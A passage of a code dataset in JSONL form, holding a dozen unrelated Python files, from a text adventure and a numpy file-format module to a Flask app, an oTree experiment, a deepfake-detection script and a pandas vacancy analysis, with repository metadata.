zip(self._seats, self._plates):\n eater.plate = plate\n eater.start()\n\n # Wait for eaters to finish...\n for eater in self._seats:\n eater.join()\n end_time = time()\n\n # how long did it take?\n delta_t = end_time - start_time\n print(f\"Successfully eating {self.meals} meals of {self.meal_consumption_time}s size in {delta_t} seconds\")\n return delta_t\n\n","sub_path":"Project1 - Dining Philosophers/philosopher_waiter_module.py","file_name":"philosopher_waiter_module.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"167895720","text":"# Write a class to hold player information, e.g. what room they are in\n# currently.\n\nfrom item import LightSource\nclass Player:\n def __init__(self, current_room, score = 0):\n self.current_room = current_room\n self.inventory = []\n self.score = score\n\n def handle_user_input(self, user_input):\n self.user_input = user_input\n if len(self.user_input.split()) == 1:\n self.handle_one_word_command()\n else:\n self.handle_two_word_command()\n\n def handle_one_word_command(self):\n if self.user_input == 'i' or self.user_input == 'inventory':\n self.list_inventory()\n elif self.user_input == 'score':\n self.display_score()\n else:\n self.move(self.user_input)\n\n def display_score(self):\n print(f'Current score is {self.score}')\n\n def list_inventory(self):\n print(f'You have: {[i.name for i in self.inventory]}')\n\n def handle_two_word_command(self):\n commands = self.user_input.split()\n command = commands[0]\n item = commands[1]\n\n if command == 'get' or command == 'take':\n self.get(item)\n elif command == 'drop':\n self.drop(item)\n else:\n print(\"I don't understand that command\\n\")\n\n def light_source_exists(self):\n if self.current_room.is_light:\n return True\n if [ item for item in self.inventory if isinstance(item, LightSource) ]:\n return True\n if [ item for item in self.current_room.items if isinstance(item, LightSource) ]:\n return True\n\n return False\n\n def get(self, item_name):\n # get index of item we're getting\n index = next((i for i, item in enumerate(self.current_room.items) if item.name == item_name), -1)\n if index != -1:\n if not self.light_source_exists():\n print(\"Good luck finding that in the dark!\")\n return\n\n gotten_item = self.current_room.items.pop(index);\n self.inventory.append(gotten_item)\n gotten_item.on_take(self)\n else:\n print(f'Error! {item_name} is not present in this room')\n\n def drop(self, item_name):\n # get index of item we're dropping\n index = next((i for i, item in enumerate(self.inventory) if item.name == item_name), -1)\n if index != -1:\n dropped_item = self.inventory.pop(index);\n self.current_room.items.append(dropped_item)\n dropped_item.on_drop()\n else:\n print(f'Error! 
You do not have {item_name} to drop')\n\n def move(self, direction):\n if hasattr(self.current_room, f'{direction}_to'):\n next_room = getattr(self.current_room, f'{direction}_to')\n if not next_room:\n print(\"You've reached a dead end!!!\\n\")\n else:\n self.current_room = next_room\n else:\n print(\"I don't understand that command\\n\")\n","sub_path":"src/adv/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"349937157","text":"import numpy\r\nimport os\r\nimport bz2\r\nimport gzip\r\nimport multiprocessing\r\nimport time\r\nimport zipfile \r\n\r\nclass scio:\r\n def __init__(self,fname,arr=None,status='w',compress=None,diff=False):\r\n if not(compress is None):\r\n if len(compress)==0:\r\n compress=None\r\n self.fid=open(fname,status)\r\n self.fname=fname\r\n self.diff=diff\r\n self.last=None\r\n self.compress=compress\r\n self.closed=False\r\n\r\n if arr is None:\r\n self.dtype=None\r\n self.shape=None\r\n self.initialized=False\r\n else:\r\n self.dtype=arr.dtype\r\n self.shape=arr.shape\r\n self.initialized=True\r\n self.write_header(arr)\r\n self.append(arr)\r\n\r\n \r\n def __del__(self):\r\n if self.closed==False:\r\n print('closing scio file ' + self.fname)\r\n self.fid.flush() \r\n self.fid.close()\r\n self.closed=True\r\n if not(self.compress is None):\r\n to_exec=self.compress + ' ' + self.fname\r\n os.system(to_exec)\r\n\r\n\r\n def close(self):\r\n self.__del__()\r\n def write_header(self,arr):\r\n sz=arr.shape\r\n myvec=numpy.zeros(len(sz)+2,dtype='int32')\r\n myvec[0]=len(sz)\r\n if self.diff:\r\n myvec[0]=-1*myvec[0]\r\n for i in range(len(sz)):\r\n myvec[i+1]=sz[i]\r\n myvec[-1]=dtype2int(arr)\r\n myvec.tofile(self.fid)\r\n\r\n \r\n def append(self,arr):\r\n if self.initialized==False:\r\n self.dtype=arr.dtype\r\n self.shape=arr.shape\r\n self.write_header(arr)\r\n self.initialized=True\r\n\r\n if (arr.shape==self.shape):\r\n pass\r\n else:\r\n print(\"shape mismatch in scio.append\")\r\n if (arr.dtype==self.dtype):\r\n if (self.diff):\r\n if self.last is None:\r\n arr_use=arr\r\n else:\r\n arr_use=arr-self.last\r\n self.last=arr.copy()\r\n else:\r\n arr_use=arr\r\n arr_use.tofile(self.fid)\r\n self.fid.flush()\r\n else:\r\n print('dtype mismatch in scio.append on file ' + self.fname)\r\n \r\n \r\n#def append(arr,fname,overwrite=False):\r\n# asdf='abc'\r\n# assert(type(fname)==type(asdf))\r\n# asdf=numpy.zeros(2)\r\n# assert(type(arr)==type(asdf))\r\n# if overwrite:\r\n# os.system('rm ' + fname)\r\n# \r\n# if (os.path.isfile(fname)):\r\n# f=open(fname,'a')\r\n# arr.tofile(f)\r\n# f.close()\r\n# else:\r\n# print 'creating ' + fname\r\n# f=open(fname,'w')\r\n# sz=arr.shape\r\n# myvec=numpy.zeros(len(sz)+2,dtype='int32')\r\n# myvec[0]=len(sz)\r\n# for i in range(len(sz)):\r\n# myvec[i+1]=sz[i]\r\n# myvec[-1]=dtype2int(arr)\r\n# #print myvec\r\n# #print sz\r\n# #print type(myvec)\r\n# myvec.tofile(f)\r\n# arr.tofile(f)\r\n# f.close()\r\n\r\ndef _read_from_string(mystr):\r\n icur=0;\r\n ndim=numpy.fromstring(mystr[icur:icur+4],dtype='int32')[0]\r\n icur=icur+4\r\n if (ndim<0):\r\n diff=True\r\n ndim=-1*ndim\r\n else:\r\n diff=False \r\n #print 'ndim is ',ndim\r\n sz=numpy.fromstring(mystr[icur:icur+4*ndim],'int32')\r\n icur=icur+4*ndim\r\n mytype=numpy.fromstring(mystr[icur:icur+4],'int32')[0]\r\n icur=icur+4\r\n\r\n #check for file size sanity\r\n bytes_per_frame=int2nbyte(mytype)*numpy.product(sz)\r\n cur_bytes=len(mystr)-icur\r\n 
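    # Drop any trailing partial frame so the fromstring/reshape below always
    # sees a whole number of frames (e.g. a file cut off mid-write).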
n_to_cut=numpy.remainder(cur_bytes,bytes_per_frame)\r\n    if n_to_cut>0:\r\n        print('We have a byte mismatch in reading scio file.  Truncating ' + repr(n_to_cut) + ' bytes.')\r\n        mystr=mystr[:-n_to_cut]\r\n\r\n    #frombuffer replaces the long-deprecated numpy.fromstring\r\n    vec=numpy.frombuffer(mystr[icur:],dtype=int2dtype(mytype))\r\n\r\n    #floor division: reshape needs integer dimensions\r\n    nmat=vec.size//numpy.prod(sz)\r\n    new_sz=numpy.zeros(sz.size+1,dtype='int32')\r\n    new_sz[0]=nmat\r\n    new_sz[1:]=sz\r\n\r\n    mat=numpy.reshape(vec,new_sz)\r\n    if diff:\r\n        mat=numpy.cumsum(mat,0)\r\n\r\n    return mat\r\n\r\n\r\ndef _read_file_as_string(fname):\r\n    if fname[-4:]=='.bz2':\r\n        f=bz2.BZ2File(fname,'r')\r\n        mystr=f.read()\r\n        f.close()\r\n        return mystr\r\n    if fname[-3:]=='.gz':\r\n        f=gzip.GzipFile(fname,'r')\r\n        mystr=f.read()\r\n        f.close()\r\n        return mystr\r\n\r\n    #if we get here, assume it's raw binary\r\n    f=open(fname,'rb')\r\n    mystr=f.read()\r\n    f.close()\r\n    return mystr\r\n\r\ndef read_from_archive(fname,arcname,strict=False):\r\n    if isinstance(arcname,str):\r\n        f=zipfile.ZipFile(arcname)\r\n    else:\r\n        f=arcname\r\n    fname=f.namelist()[0]+fname\r\n    mystr=None\r\n    if fname in f.namelist():\r\n        mystr=f.read(fname)\r\n    elif fname+'.bz2' in f.namelist():\r\n        tmp=f.read(fname+'.bz2')\r\n        mystr=bz2.decompress(tmp)\r\n    elif fname+'.gz' in f.namelist():\r\n        tmp=f.read(fname+'.gz')\r\n        mystr=gzip.decompress(tmp)\r\n    if mystr is None:\r\n        print(fname,' not found in ',arcname)\r\n        return None\r\n    return _read_from_string(mystr)\r\n\r\ndef read(fname,strict=False):\r\n    if strict:\r\n        #only read the filename passed in\r\n        mystr=_read_file_as_string(fname)\r\n        return _read_from_string(mystr)\r\n    else:\r\n        #try some guesses about what other sane filenames might be based on the input filename\r\n        fnames=[fname]\r\n        if fname[-4:]=='.bz2':\r\n            fnames.append(fname[:-4])\r\n        if fname[-3:]=='.gz':\r\n            fnames.append(fname[:-3])\r\n        fnames.append(fname+'.bz2')\r\n        fnames.append(fname+'.gz')\r\n\r\n        for fname in fnames:\r\n            try:\r\n                mystr=_read_file_as_string(fname)\r\n                if len(mystr)>0:\r\n                    try: #try/except added by JLS 11 June 2019 to catch cases where string length is unexpected\r\n                        return _read_from_string(mystr)\r\n                    except Exception:\r\n                        print('File ',fname,' appears to be garbled when parsing string of length ',len(mystr))\r\n                        return None\r\n                else:\r\n                    return None\r\n            except Exception:\r\n                pass\r\n        return None\r\n\r\ndef read_files(fnames,ncpu=0):\r\n    t1=time.time()\r\n    if ncpu==0:\r\n        ncpu=multiprocessing.cpu_count()\r\n    p=multiprocessing.Pool(ncpu)\r\n    data=p.map(read,fnames)\r\n    #without the p.terminate, the pool seems to last, which can cause the system to run out of processes.\r\n    #this isn't what the documentation says should happen (terminate is supposed to get called when p\r\n    #gets garbage collected), but oh well...\r\n    p.terminate()\r\n    t2=time.time()\r\n    return data\r\n\r\n\r\ndef int2dtype(myint):\r\n    if (myint==8):\r\n        return 'float64'\r\n    if (myint==4):\r\n        return 'float32'\r\n    if (myint==-4):\r\n        return 'int32'\r\n    if (myint==-8):\r\n        return 'int64'\r\n    if (myint==-104):\r\n        return 'uint32'\r\n    if (myint==-108):\r\n        return 'uint64'\r\n\r\ndef int2nbyte(myint):\r\n    nbyte=numpy.abs(myint)\r\n    if nbyte>100:\r\n        nbyte=nbyte-100\r\n    return nbyte\r\n\r\ndef dtype2int(dtype_str):\r\n\r\n    if (type(dtype_str)!=numpy.dtype):\r\n        dtype_str=dtype_str.dtype\r\n\r\n    aa=numpy.zeros(1,dtype='float64')\r\n    if (dtype_str==aa.dtype):\r\n        return 8\r\n\r\n    aa=numpy.zeros(1,dtype='float32')\r\n    if (dtype_str==aa.dtype):\r\n        return 4\r\n\r\n    aa=numpy.zeros(1,dtype='int32')\r\n    if (dtype_str==aa.dtype):\r\n        return -4\r\n\r\n    aa=numpy.zeros(1,dtype='int64')\r\n    if (dtype_str==aa.dtype):\r\n        return -8\r\n\r\n    aa=numpy.zeros(1,dtype='uint32')\r\n    if (dtype_str==aa.dtype):\r\n        return -104\r\n\r\n    aa=numpy.zeros(1,dtype='uint64')\r\n    if (dtype_str==aa.dtype):\r\n        return -108\r\n\r\n    print('unknown dtype')\r\n    return 0\r\n\r\n","sub_path":"src/scio/scio.py","file_name":"scio.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"235690629","text":"# -*- coding: utf-8 -*-\n\"\"\"\ntehtava04.py\nWeek 2, exercise 4\nMarko Vihoma\n\"\"\"\n\n\ndef pituusmitta(text):\n    \"\"\" Returns the number of characters in the parameter \"\"\"\n    return len(str(text))\n\n\ndef main():\n    \"\"\" Main function (the user-facing strings are intentionally Finnish) \"\"\"\n    empty = 'Et antanut syötettä'\n    text = empty\n\n    while True:\n        text = input('Anna syöte (Lopeta lopettaa): ')\n\n        if text == 'Lopeta':\n            return\n\n        if text == '':\n            print(empty)\n        else:\n            size = pituusmitta(text)\n            print(str(\"Antamasi syöte oli {0} merkkiä pitkä\").format(size))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"vko2/tehtava04.py","file_name":"tehtava04.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"114823778","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\n# traverse + divide conquer\nclass Solution(object):\n    # value consecutive\n    def longestConsecutive(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        return self.helper(root, None, 0)\n\n    def helper(self, root, parent, length_no_root):\n        if not root: return 0\n\n        if parent is not None and parent.val + 1 == root.val:\n            length = length_no_root + 1\n        else:\n            length = 1\n        # left and right subtree, parent is root\n        left = self.helper(root.left, root, length)\n        right = self.helper(root.right, root, length)\n        return max(length, max(left, right))\n    # Divide and conquer: handle the left and right children separately.\n    # If a child's value is exactly one greater than its parent's, the recursive call extends the running length;\n    # otherwise the recursion restarts the length at 1. The right child is handled the same way as the left.\n\n\n# another version\n\n\"\"\"\nclass ResultType:\n    maxInSubtree, maxFromRoot = 0, 0\n    def __init__(self, maxInSubtree, maxFromRoot):\n        self.maxInSubtree = maxInSubtree\n        self.maxFromRoot = maxFromRoot\n\"\"\"\nclass Solution(object):\n    # value consecutive\n    def longestConsecutive(self, root):\n        \"\"\"\n        :type root: TreeNode\n        :rtype: int\n        \"\"\"\n        return self.helper(root)[0]\n\n    def helper(self, root):\n        if not root: return 0, 0\n        left = self.helper(root.left)\n        right = self.helper(root.right)\n\n        result = (0, 1)  # maxInSubtree, maxFromRoot\n        if root.left and root.val + 1 == root.left.val:\n            result = (0, max(result[1], left[1] + 1))\n        if root.right and root.val + 1 == root.right.val:\n            result = (0, max(result[1], right[1] + 1))\n\n        result = (max(result[1], max(left[0], right[0])), result[1])\n        return result\n","sub_path":"binary_tree/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"241117302","text":"from flask import Flask, render_template\nfrom domain.domains import Jogo\napp = Flask(__name__)\n\n\ndef jogos_padrao():\n    return [\n        Jogo('Tetris', 'Arcade', 'Atari'),\n        Jogo('Mario', 'Plataforma', 'SNES'),\n        Jogo('Pokemon Lets Go', 'RPG', 'Switch')\n    ]\n\n\n@app.route('/home')\ndef home():\n    lista_jogos = jogos_padrao()\n    return render_template('lista.html', titulo='JOGOS', jogos=lista_jogos)\n\n\n@app.route('/novo')\ndef novo():\n    return render_template('cadastro.html', titulo='Novo Jogo')\n\n\ndef main():\n    app.run()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"jogoteca.py","file_name":"jogoteca.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"47914574","text":"# This file measures the running time of all expensive algorithms (mainly image algorithms)\nfrom timeit import default_timer as timer\n\n\nclass CostTimeCal:\n    def __init__(self, CostTimeTypes, isCaled):\n        '''\n\n        :param CostTimeTypes: string naming which cost time is measured,\n                            e.g. 'LkTrackTime', 'YoloTime', 'BglearnTime'\n        :param isCaled: boolean, whether timing is enabled\n        '''\n        self.__CostTimeType = CostTimeTypes  # str naming which cost time is measured\n        self.__isCal = isCaled\n        self.__startTime = 0\n        self.__endTime = 0\n        self.__costTime = -1\n\n    def calSet(self):\n        if self.__isCal is True:\n            self.__startTime = timer()\n\n    def calEnd(self):\n        if self.__isCal is True:\n            self.__endTime = timer()\n            costTime = self.__endTime - self.__startTime\n            self.__costTime = costTime\n            return round(self.__costTime, 3)  # keep three decimal places\n\n    def printCostTime(self):\n        if self.__isCal is True:\n            print(str(self.__CostTimeType)+\" = %f ms\" % (round(self.__costTime * 1000)))\n        else:\n            pass\n\n\n# def costTimeCalInit():\n#\n#     trackStartTime = 0\n#     trackEndTime = 0\n#     if statisticTrackTime is True:\n#         trackStartTime = timer()\n#     p0, label, LKtrackedList = self.imgproc.trackObj(featureimg, secondimg, drawimg, label, p0, deltaT)\n#     if statisticTrackTime is True:\n#         trackEndTime = timer()\n#         trackCostTime = trackEndTime - trackStartTime\n#         print(\"TrackCostTime!!!!!!!!!!!!!!!!!!!!!! = %f ms\" % (trackCostTime * 1000))","sub_path":"tools/costTimeCal.py","file_name":"costTimeCal.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"544698749","text":"# -*- coding: utf-8 -*-\n# pylint: disable=invalid-name\n###############################################################################\n# Copyright (c), The AiiDA-CP2K authors.                                      #\n# SPDX-License-Identifier: MIT                                                #\n# AiiDA-CP2K is hosted on GitHub at https://github.com/aiidateam/aiida-cp2k   #\n# For further information on the license, see the LICENSE.txt file.           
#\n###############################################################################\n\"\"\"Run DFT calculation with structure specified in the input file\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport sys\nimport click\n\nfrom aiida.orm import (Code, Dict)\nfrom aiida.engine import run\nfrom aiida.common import NotExistent\nfrom aiida.plugins import CalculationFactory\n\nCp2kCalculation = CalculationFactory('cp2k')\n\n\n@click.command('cli')\n@click.argument('codelabel')\ndef main(codelabel):\n \"\"\"Run DFT calculation with structure specified in the input file\"\"\"\n try:\n code = Code.get_from_string(codelabel)\n except NotExistent:\n print(\"The code '{}' does not exist\".format(codelabel))\n sys.exit(1)\n\n print(\"Testing CP2K ENERGY on H2 (DFT) without StructureData...\")\n\n # parameters\n parameters = Dict(\n dict={\n 'FORCE_EVAL': {\n 'METHOD': 'Quickstep',\n 'DFT': {\n 'BASIS_SET_FILE_NAME': 'BASIS_MOLOPT',\n 'QS': {\n 'EPS_DEFAULT': 1.0e-12,\n 'WF_INTERPOLATION': 'ps',\n 'EXTRAPOLATION_ORDER': 3,\n },\n 'MGRID': {\n 'NGRIDS': 4,\n 'CUTOFF': 280,\n 'REL_CUTOFF': 30,\n },\n 'XC': {\n 'XC_FUNCTIONAL': {\n '_': 'LDA',\n },\n },\n 'POISSON': {\n 'PERIODIC': 'none',\n 'PSOLVER': 'MT',\n },\n },\n 'SUBSYS': {\n # structure directly included in parameters\n 'CELL': {\n 'ABC': '4.0 4.0 4.75'\n },\n 'COORD': {\n ' ': ['H 2.0 2.0 2.737166', 'H 2.0 2.0 2.000000']\n },\n 'KIND': [\n {\n '_': 'O',\n 'BASIS_SET': 'DZVP-MOLOPT-SR-GTH',\n 'POTENTIAL': 'GTH-LDA-q6'\n },\n {\n '_': 'H',\n 'BASIS_SET': 'DZVP-MOLOPT-SR-GTH',\n 'POTENTIAL': 'GTH-LDA-q1'\n },\n ],\n },\n }\n })\n\n # resources\n options = {\n \"resources\": {\n \"num_machines\": 1,\n \"num_mpiprocs_per_machine\": 1,\n },\n \"max_wallclock_seconds\": 1 * 3 * 60,\n }\n\n inputs = {'parameters': parameters, 'code': code, 'metadata': {'options': options,}}\n\n print(\"submitted calculation...\")\n calc = run(Cp2kCalculation, **inputs)\n\n # check energy\n expected_energy = -1.14005678487\n if abs(calc['output_parameters'].dict.energy - expected_energy) < 1e-10:\n print(\"OK, energy has the expected value\")\n else:\n print(\"ERROR!\")\n print(\"Expected energy value: {}\".format(expected_energy))\n print(\"Actual energy value: {}\".format(calc['output_parameters'].dict.energy))\n sys.exit(3)\n\n sys.exit(0)\n\n\nif __name__ == '__main__':\n main() # pylint: disable=no-value-for-parameter\n","sub_path":"examples/single_calculations/test_no_struct.py","file_name":"test_no_struct.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"263466046","text":"from otree.api import (\n models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer,\n Currency as c, currency_range\n)\nimport random\n\n\nclass Constants(BaseConstants):\n name_in_url = 'producer_consumer'\n players_per_group = 8\n num_rounds = 2\n endowment = c(50)\n reward = c(20)\n red = 'Red'\n blue = 'Blue'\n trade_good = 'Trade Good'\n\nclass Subsession(BaseSubsession):\n def creating_session(self):\n if self.round_number == 1:\n self.group_randomly()\n\n # create random pairings\n self.session.vars['pairs'] = []\n for r in range(Constants.num_rounds):\n pairs = {}\n\n # a way to pair people given certain probabilities of\n # getting paired within your group or within the other group\n # NOTE: self.session.config['probability_of_same_group'] times\n # Constants.players_per_group needs to be an integer.\n g1 = [i for i in 
range(Constants.players_per_group)]\n random.shuffle(g1)\n g1_sample_homogeneous = random.sample(g1,\n int(Constants.players_per_group\n * self.session.config['probability_of_same_group']))\n g1_sample_heterogeneous = [x for x in g1\n if x not in g1_sample_homogeneous]\n g2 = [i for i in range(Constants.players_per_group)]\n random.shuffle(g2)\n g2_sample_homogeneous = random.sample(g2,\n int(Constants.players_per_group\n * self.session.config['probability_of_same_group']))\n g2_sample_heterogeneous = [x for x in g2\n if x not in g2_sample_homogeneous]\n for i in range(0, len(g1_sample_homogeneous), 2):\n pairs[(0, g1_sample_homogeneous[i])] = (0,\n g1_sample_homogeneous[i + 1])\n pairs[(0, g1_sample_homogeneous[i + 1])] = (0,\n g1_sample_homogeneous[i])\n for i in range(0, len(g2_sample_homogeneous), 2):\n pairs[(1, g2_sample_homogeneous[i])] = (1,\n g2_sample_homogeneous[i + 1])\n pairs[(1, g2_sample_homogeneous[i + 1])] = (1,\n g2_sample_homogeneous[i])\n for i in range(len(g1_sample_heterogeneous)):\n pairs[(0, g1_sample_heterogeneous[i])] = (1,\n g2_sample_heterogeneous[i])\n pairs[(1, g2_sample_heterogeneous[i])] = (0,\n g1_sample_heterogeneous[i])\n self.session.vars['pairs'].append(pairs)\n \n # there will always only be 2 groups\n for g_index, g in enumerate(self.get_groups()):\n # set group color for player\n group_color = Constants.red if g_index == 0 else Constants.blue\n # define random roles for players (producer/consumer),\n # ensuring half are producers and half are consumers\n roles = [Constants.trade_good for n in range(int(Constants.players_per_group / 2))]\n roles += [group_color for n in range(\n int(Constants.players_per_group / 2))]\n random.shuffle(roles)\n # set each player's group color, and starting token (which\n # defines role\n for p_index, p in enumerate(g.get_players()):\n p.participant.vars['group_color'] = group_color\n p.participant.vars['token'] = roles[p_index]\n p.participant.payoff += Constants.endowment\n else:\n self.group_like_round(1)\n \nclass Group(BaseGroup):\n pass\n\nclass Player(BasePlayer):\n role_pre = models.StringField() # 'Producer', 'Consumer'\n other_role_pre = models.StringField()\n token_color = models.StringField() # Constants.red, Constants.blue, None\n other_token_color = models.StringField()\n group_color = models.StringField() # Constants.red, Constants.blue\n other_group_color = models.StringField()\n trade_attempted = models.BooleanField(\n choices=[\n [False, 'No'],\n [True, 'Yes'],\n ]\n )\n trade_succeeded = models.BooleanField()\n\n def set_payoffs(self, round_payoff):\n self.payoff = round_payoff\n\n","sub_path":"games_up/bimonetary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463629955","text":"import cv2 as cv\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nfrom PIL import Image as pil_image\r\nfrom transform import xception_default_data_transforms\r\nimport dlib\r\nimport time\r\nimport torch\r\nimport csv\r\nimport torch.nn as nn\r\nimport importlib.util\r\nhome='/kaggle/input/deepfake-detection-challenge/'\r\nvideos=os.listdir(home)\r\nfile=open('/kaggle/working/submission.csv',mode='w',newline='')\r\nwrite=csv.writer(file,delimiter=',')\r\nos.chdir('/kaggle/input/transform/')\r\nimportlib.import_module('transform')\r\nos.chdir('/kaggle/input/network/')\r\nimportlib.import_module('network')\r\n\r\n\r\n\r\nwrite.writerow(['filename','label'])\r\ndef 
get_boundingbox(face, width, height, scale=1.3, minsize=None):\r\n    \"\"\"\r\n    Expects a dlib face to generate a quadratic bounding box.\r\n    :param face: dlib face class\r\n    :param width: frame width\r\n    :param height: frame height\r\n    :param scale: bounding box size multiplier to get a bigger face region\r\n    :param minsize: set minimum bounding box size\r\n    :return: x, y, bounding_box_size in opencv form\r\n    \"\"\"\r\n    x1 = face.left()\r\n    y1 = face.top()\r\n    x2 = face.right()\r\n    y2 = face.bottom()\r\n    size_bb = int(max(x2 - x1, y2 - y1) * scale)\r\n    if minsize:\r\n        if size_bb < minsize:\r\n            size_bb = minsize\r\n    center_x, center_y = (x1 + x2) // 2, (y1 + y2) // 2\r\n\r\n    # Check for out of bounds, x-y top left corner\r\n    x1 = max(int(center_x - size_bb // 2), 0)\r\n    y1 = max(int(center_y - size_bb // 2), 0)\r\n    # Check for too big bb size for given x, y\r\n    size_bb = min(width - x1, size_bb)\r\n    size_bb = min(height - y1, size_bb)\r\n\r\n    return x1, y1, size_bb\r\ndef predict_with_model(image, model, post_function=nn.Softmax(dim=1),\r\n                       cuda=True):\r\n    \"\"\"\r\n    Predicts the label of an input image. Preprocesses the input image and\r\n    casts it to cuda if required\r\n\r\n    :param image: numpy image\r\n    :param model: torch model with linear layer at the end\r\n    :param post_function: e.g., softmax\r\n    :param cuda: enables cuda, must be the same parameter as the model\r\n    :return: prediction (1 = fake, 0 = real)\r\n    \"\"\"\r\n    # Preprocess\r\n    preprocessed_image = preprocess_image(image, cuda)\r\n\r\n    # Model prediction\r\n    output = model(preprocessed_image)\r\n    output = post_function(output)\r\n\r\n    # Cast to desired\r\n    _, prediction = torch.max(output, 1)  # argmax\r\n    prediction = float(prediction.cpu().numpy())\r\n\r\n    return int(prediction), output\r\n\r\ndef preprocess_image(image, cuda=True):\r\n    \"\"\"\r\n    Preprocesses the image such that it can be fed into our network.\r\n    During this process we invoke PIL to cast it into a PIL image.\r\n\r\n    :param image: numpy image in opencv form (i.e., BGR and of shape [height, width, 3])\r\n    :return: pytorch tensor of shape [1, 3, image_size, image_size], not\r\n        necessarily casted to cuda\r\n    \"\"\"\r\n    # Revert from BGR\r\n    image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\r\n    # Preprocess using the preprocessing function used during training and\r\n    # casting it to PIL image\r\n    preprocess = xception_default_data_transforms['test']\r\n    preprocessed_image = preprocess(pil_image.fromarray(image))\r\n    # Add first dimension as the network expects a batch\r\n    preprocessed_image = preprocessed_image.unsqueeze(0)\r\n    if cuda:\r\n        preprocessed_image = preprocessed_image.cuda()\r\n    return preprocessed_image\r\ndtype = torch.cuda.FloatTensor\r\nface_detector = dlib.get_frontal_face_detector()\r\nmodel = torch.load('/kaggle/input/network/network/all_c23.p')\r\nmodel=model.cuda()\r\n\r\n\r\nfor each in videos:\r\n\r\n    nume=each\r\n    # home already ends with '/', so plain concatenation builds a valid POSIX path\r\n    each=home+each\r\n\r\n    capture = cv.VideoCapture(each)\r\n    maxi=-1.0\r\n    for i in range(0, 300):\r\n        ret = capture.grab()\r\n\r\n        if i % 35 == 0:\r\n            ret, frame = capture.retrieve()\r\n\r\n            if(ret):\r\n                gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n                faces = face_detector(gray, 1)\r\n                if len(faces):\r\n                    faces=faces[0]\r\n                    height, width = frame.shape[:2]\r\n                    x, y, size = get_boundingbox(faces, width, height)\r\n                    cropped_face = frame[y:y+size, x:x+size]\r\n\r\n                    prediction,altceva=predict_with_model(cropped_face,model,cuda=True)\r\n                    rezultat=float(altceva.data[0].data[1])\r\n                    if(rezultat>maxi):\r\n                        maxi=rezultat\r\n                # do something with frame\r\n\r\n    # clamp the submitted probability into [0.2, 0.8]\r\n    if(maxi<0.2):\r\n        maxi=0.2\r\n    if(maxi>0.8):\r\n        maxi=0.8\r\n    write.writerow([nume,maxi])\r\n    capture.release()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"65288047","text":"#!/usr/bin/python\n\nimport string\n\n#Removes punctuation and whitespace, then lowercases\ndef __sanitize(input_str):\n    translator = input_str.maketrans({\n        key: None for key in string.punctuation + ' '\n    })\n    return input_str.translate(translator).lower()\n\n\ndef has_same_letters(str1, str2):\n    return sorted(__sanitize(str1)) == sorted(__sanitize(str2))\n\n\ndef anagram(str1, str2):\n    is_anagram = 'is' if has_same_letters(str1, str2) else 'is NOT'\n    return '{} {} an anagram of {}'.format(str1, is_anagram, str2)\n\n\nif __name__ == '__main__':\n\n    inputs = ['\"wisdom\" ? \"mid sow\"',\n              '\"Seth Rogan\" ? \"Gathers No\"',\n              '\"Reddit\" ? \"Eat Dirt\"',\n              '\"Schoolmaster\" ? \"The classroom\"',\n              '\"Astronomers\" ? \"Moon starer\"',\n              '\"Vacation Times\" ? \"I\\'m Not as Active\"',\n              '\"Dormitory\" ? \"Dirty Rooms\"'\n              ]\n\n    for input_string in inputs:\n        input_arr = input_string.split(' ? ')\n        print(anagram(*input_arr))\n","sub_path":"python/easy/challenge283_AnagramDetector/anagrams.py","file_name":"anagrams.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"555692260","text":"import pandas\nimport re\nfrom datetime import datetime\n\ndf = pandas.read_csv('Moscow.csv')\n\ndf[\"name\"] = df[\"name\"].str.lower()\n\n# Group vacancies by job-title keywords\nvacancy_list = ['разработчик|developer|программист', 'инженер|engineer', 'архитектор|architect', 'аналитик|analyst',\n                'data scientist', 'c++', 'c#', 'python', 'js|javascript', '1c', 'goland', 'frontend',\n                'backend', 'full-stack|fullstack', 'security|безопасность']\n\nprint(df.columns)\n\nfor column_name in df.columns:\n    print(df[column_name].value_counts())\n    print(df[column_name].isnull())\n\ndf_group = pandas.DataFrame()\nfor vacancy in vacancy_list:\n    for v in vacancy.split('|'):\n        dfV = df[df[\"name\"].replace('/', '').str.contains(re.escape(v))]\n        if len(df_group.columns) == 0:\n            df_group = dfV.copy()\n        else:\n            # DataFrame.append returns a new frame, so the result has to be assigned back\n            df_group = 